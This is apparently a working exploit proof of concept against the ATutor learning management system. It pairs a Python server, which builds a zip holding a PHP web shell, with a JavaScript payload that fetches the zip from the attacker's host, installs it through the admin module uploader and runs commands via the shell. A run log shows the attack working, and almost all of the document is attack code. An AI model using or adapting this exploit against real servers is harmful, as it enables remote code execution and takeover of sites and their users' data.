Code Execution LMS

1. #!/usr/bin/python
2.  
3. import sys
4. import zipfile
5. import BaseHTTPServer
6. from cStringIO import StringIO
7. from SimpleHTTPServer import SimpleHTTPRequestHandler
8.  
9. if len(sys.argv) < 3:
10.     print "Usage: %s <lport> <target>" % sys.argv[0]
11.     print "eg: %s 8000 172.16.69.128" % sys.argv[0]
12.     sys.exit(1)
13.  
14. def _build_zip():
15.     """
16.    builds the zip file
17.    """
18.     f = StringIO()
19.     z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
20.     z.writestr('pwn/si.php', "<?php system($_GET['cmd']); ?>")
21.     z.close()
22.     handle = open('pwn.zip','wb')
23.     handle.write(f.getvalue())
24.     handle.close
25.  
26. class CORSRequestHandler (SimpleHTTPRequestHandler):
27.     def end_headers (self):
28.         self.send_header('Access-Control-Allow-Origin', 'http://%s' % sys.argv[2])
29.         SimpleHTTPRequestHandler.end_headers(self)
30.  
31. if __name__ == '__main__':
32.     _build_zip()
33.     BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)
34.  
35. mr_me@jupiter:~$ ./poc.py 8000 172.16.69.128
36. Serving HTTP on 0.0.0.0 port 8000 ...
37. 172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /exp.js HTTP/1.1" 200 -
38. 172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /pwn.zip HTTP/1.1" 200 -
39.  
40. ~ de Mexico con amor,
41.  
42. */
43.  
44. var get_hostname = function(href) {
45.     var l = document.createElement("a");
46.     l.href = href;
47.     return l.hostname + ":" + l.port;
48. };
49.  
50. function trolololol(url, file_data, filename) {
51.    var file_size = file_data.length,
52.    boundary = "828116593165207937691721278",
53.    xhr = new XMLHttpRequest();
54.  
55.    // latest ff doesnt have sendAsBinary(), so we redefine it
56.    if(!xhr.sendAsBinary){
57.       xhr.sendAsBinary = function(datastr) {
58.           function byteValue(x) {
59.               return x.charCodeAt(0) & 0xff;
60.           }
61.           var ords = Array.prototype.map.call(datastr, byteValue);
62.           var ui8a = new Uint8Array(ords);
63.           this.send(ui8a.buffer);
64.       }
65.    }
66.    
67.    // the callback after this stage is done...
68.    xhr.onreadystatechange = function() {
69.        if (xhr.readyState == XMLHttpRequest.DONE) {
70.            xhr = new XMLHttpRequest();
71.            // change this if you change the zip
72.            xhr.open("GET", "/ATutor/mods/pwn/si.php?cmd=id", true);
73.            xhr.send();
74.        }
75.    }
76.  
77.    xhr.open("POST", url, true);
78.    // simulate a file MIME POST request.
79.    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
80.    xhr.setRequestHeader("Content-Length", file_size);
81.    var body = "--" + boundary + "\r\n";
82.    body += 'Content-Disposition: form-data; name="modulefile"; filename="' + filename + '"\r\n';
83.    body += "Content-Type: archive/zip\r\n\r\n";
84.    body += file_data + "\r\n";
85.    body += "--" + boundary + "\r\n";
86.    body += 'Content-Disposition: form-data; name="install_upload"\r\n\r\n';
87.    body += "junk\r\n";
88.    body += "--" + boundary;
89.    xhr.sendAsBinary(body);
90.    return true;
91. }
92.  
93. function pwn(){
94.     var xhr = new XMLHttpRequest();
95.     // et phone home
96.     var home = get_hostname(document.scripts[0].src);
97.     // get our own zip file
98.     xhr.open('GET', 'http://' + home + '/pwn.zip', true);
99.     xhr.responseType = 'blob';
100.     xhr.onload = function(e) {
101.         if (this.status == 200) {
102.             // use the FileReader class to get the raw binary
103.             var reader = new window.FileReader();
104.             reader.readAsBinaryString(new Blob([this.response], {type: 'application/zip'}));
105.             reader.onloadend = function() {
106.                 trolololol("/ATutor/mods/_core/modules/install_modules.php", reader.result, "pwn.zip");
107.             }
108.         }
109.     };
110.     xhr.send();
111. }
112.  
113. pwn();